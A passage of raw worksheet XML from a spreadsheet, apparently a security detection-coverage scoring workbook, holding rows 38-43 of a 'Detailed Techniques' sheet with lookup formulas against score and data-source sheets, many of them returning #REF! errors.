    </row>
    <row r="38" spans="1:25" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A38" s="8" t="s">
        <v>43</v>
      </c>
      <c r="B38" s="8" t="s">
        <v>438</v>
      </c>
      <c r="C38" s="8" t="s">
        <v>439</v>
      </c>
      <c r="D38" s="10" t="s">
        <v>440</v>
      </c>
      <c r="E38" s="10" t="s">
        <v>441</v>
      </c>
      <c r="F38" s="10" t="s">
        <v>442</v>
      </c>
      <c r="G38" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K38,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H38" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F38&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F38))-LEN(SUBSTITUTE(TRIM(F38),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I38" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F38&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F38))-LEN(SUBSTITUTE(TRIM(F38),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J38" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F38&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F38))-LEN(SUBSTITUTE(TRIM(F38),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K38" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L38" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F38&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F38))-LEN(SUBSTITUTE(TRIM(F38),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M38" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N38" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F38&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F38))-LEN(SUBSTITUTE(TRIM(F38),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O38" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P38" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F38&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F38))-LEN(SUBSTITUTE(TRIM(F38),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q38" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R38" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F38&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F38))-LEN(SUBSTITUTE(TRIM(F38),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S38" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T38" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F38&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F38))-LEN(SUBSTITUTE(TRIM(F38),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U38" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V38" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F38&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F38))-LEN(SUBSTITUTE(TRIM(F38),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W38" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X38" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F38&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F38))-LEN(SUBSTITUTE(TRIM(F38),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y38" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="39" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A39" s="8" t="s">
        <v>71</v>
      </c>
      <c r="B39" s="8" t="s">
        <v>443</v>
      </c>
      <c r="C39" s="8" t="s">
        <v>444</v>
      </c>
      <c r="D39" s="10" t="s">
        <v>445</v>
      </c>
      <c r="E39" s="10" t="s">
        <v>446</v>
      </c>
      <c r="F39" s="10" t="s">
        <v>447</v>
      </c>
      <c r="G39" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K39,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H39" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F39&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F39))-LEN(SUBSTITUTE(TRIM(F39),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I39" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F39&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F39))-LEN(SUBSTITUTE(TRIM(F39),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J39" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F39&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F39))-LEN(SUBSTITUTE(TRIM(F39),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K39" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L39" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F39&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F39))-LEN(SUBSTITUTE(TRIM(F39),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M39" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N39" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F39&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F39))-LEN(SUBSTITUTE(TRIM(F39),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O39" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P39" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F39&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F39))-LEN(SUBSTITUTE(TRIM(F39),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q39" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R39" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F39&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F39))-LEN(SUBSTITUTE(TRIM(F39),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S39" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T39" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F39&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F39))-LEN(SUBSTITUTE(TRIM(F39),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U39" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V39" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F39&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F39))-LEN(SUBSTITUTE(TRIM(F39),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W39" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X39" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F39&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F39))-LEN(SUBSTITUTE(TRIM(F39),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y39" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="40" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A40" s="8" t="s">
        <v>55</v>
      </c>
      <c r="B40" s="8" t="s">
        <v>7</v>
      </c>
      <c r="C40" s="8" t="s">
        <v>448</v>
      </c>
      <c r="D40" s="10" t="s">
        <v>449</v>
      </c>
      <c r="E40" s="10" t="s">
        <v>450</v>
      </c>
      <c r="F40" s="10" t="s">
        <v>451</v>
      </c>
      <c r="G40" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K40,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H40" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F40&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F40))-LEN(SUBSTITUTE(TRIM(F40),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I40" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F40&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F40))-LEN(SUBSTITUTE(TRIM(F40),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J40" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F40&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F40))-LEN(SUBSTITUTE(TRIM(F40),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K40" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L40" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F40&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F40))-LEN(SUBSTITUTE(TRIM(F40),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M40" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N40" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F40&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F40))-LEN(SUBSTITUTE(TRIM(F40),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O40" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P40" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F40&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F40))-LEN(SUBSTITUTE(TRIM(F40),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q40" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R40" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F40&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F40))-LEN(SUBSTITUTE(TRIM(F40),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S40" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T40" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F40&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F40))-LEN(SUBSTITUTE(TRIM(F40),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U40" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V40" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F40&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F40))-LEN(SUBSTITUTE(TRIM(F40),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W40" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X40" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F40&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F40))-LEN(SUBSTITUTE(TRIM(F40),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y40" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="41" spans="1:25" ht="171" x14ac:dyDescent="0.45">
      <c r="A41" s="8" t="s">
        <v>106</v>
      </c>
      <c r="B41" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C41" s="8" t="s">
        <v>452</v>
      </c>
      <c r="D41" s="10" t="s">
        <v>453</v>
      </c>
      <c r="E41" s="10" t="s">
        <v>454</v>
      </c>
      <c r="F41" s="10" t="s">
        <v>455</v>
      </c>
      <c r="G41" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K41,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H41" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F41&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F41))-LEN(SUBSTITUTE(TRIM(F41),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I41" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F41&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F41))-LEN(SUBSTITUTE(TRIM(F41),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J41" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F41&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F41))-LEN(SUBSTITUTE(TRIM(F41),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K41" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L41" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F41&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F41))-LEN(SUBSTITUTE(TRIM(F41),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M41" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N41" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F41&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F41))-LEN(SUBSTITUTE(TRIM(F41),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O41" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P41" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F41&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F41))-LEN(SUBSTITUTE(TRIM(F41),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q41" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R41" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F41&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F41))-LEN(SUBSTITUTE(TRIM(F41),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S41" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T41" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F41&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F41))-LEN(SUBSTITUTE(TRIM(F41),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U41" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V41" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F41&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F41))-LEN(SUBSTITUTE(TRIM(F41),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W41" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X41" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F41&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F41))-LEN(SUBSTITUTE(TRIM(F41),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y41" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="42" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A42" s="8" t="s">
        <v>67</v>
      </c>
      <c r="B42" s="8" t="s">
        <v>8</v>
      </c>
      <c r="C42" s="8" t="s">
        <v>456</v>
      </c>
      <c r="D42" s="10" t="s">
        <v>457</v>
      </c>
      <c r="E42" s="10" t="s">
        <v>299</v>
      </c>
      <c r="F42" s="10" t="s">
        <v>458</v>
      </c>
      <c r="G42" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K42,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H42" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F42&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F42))-LEN(SUBSTITUTE(TRIM(F42),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I42" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F42&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F42))-LEN(SUBSTITUTE(TRIM(F42),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J42" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F42&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F42))-LEN(SUBSTITUTE(TRIM(F42),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K42" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L42" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F42&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F42))-LEN(SUBSTITUTE(TRIM(F42),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M42" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N42" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F42&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F42))-LEN(SUBSTITUTE(TRIM(F42),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O42" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P42" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F42&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F42))-LEN(SUBSTITUTE(TRIM(F42),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q42" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R42" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F42&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F42))-LEN(SUBSTITUTE(TRIM(F42),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S42" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T42" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F42&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F42))-LEN(SUBSTITUTE(TRIM(F42),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U42" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V42" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F42&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F42))-LEN(SUBSTITUTE(TRIM(F42),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W42" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X42" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F42&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F42))-LEN(SUBSTITUTE(TRIM(F42),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y42" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="43" spans="1:25" ht="171" x14ac:dyDescent="0.45">
      <c r="A43" s="8" t="s">
        <v>70</v>
      </c>
      <c r="B43" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C43" s="8" t="s">
        <v>459</v>
      </c>
      <c r="D43" s="10" t="s">
        <v>460</v>
      </c>
      <c r="E43" s="10" t="s">
        <v>461</v>
      </c>
      <c r="F43" s="10" t="s">
        <v>462</v>
      </c>
      <c r="G43" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K43,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H43" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F43&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F43))-LEN(SUBSTITUTE(TRIM(F43),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I43" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F43&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F43))-LEN(SUBSTITUTE(TRIM(F43),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J43" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F43&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F43))-LEN(SUBSTITUTE(TRIM(F43),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K43" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L43" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F43&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F43))-LEN(SUBSTITUTE(TRIM(F43),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M43" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N43" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F43&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F43))-LEN(SUBSTITUTE(TRIM(F43),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O43" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P43" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F43&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F43))-LEN(SUBSTITUTE(TRIM(F43),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q43" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R43" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F43&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F43))-LEN(SUBSTITUTE(TRIM(F43),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S43" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T43" s="20" t="e">
